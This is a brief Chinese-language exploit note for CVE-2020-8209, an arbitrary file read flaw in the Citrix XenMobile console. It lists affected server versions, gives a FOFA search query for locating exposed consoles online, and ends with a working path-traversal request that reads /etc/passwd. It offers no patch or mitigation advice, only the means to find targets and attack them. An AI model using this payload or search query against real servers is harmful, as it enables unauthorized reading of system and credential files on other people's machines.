(CVE-2020-8209)XenMobile-控制台存在任意文件读取漏洞
0x01 影响版本
RP2之前的XenMobile服务器10.12
RP4之前的XenMobile服务器10.11
RP6之前的XenMobile服务器10.10
10.9 RP5之前的XenMobile服务器
0x02 fofa语法
app="XenMobile-控制台"
应用截图
0x03 POC
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd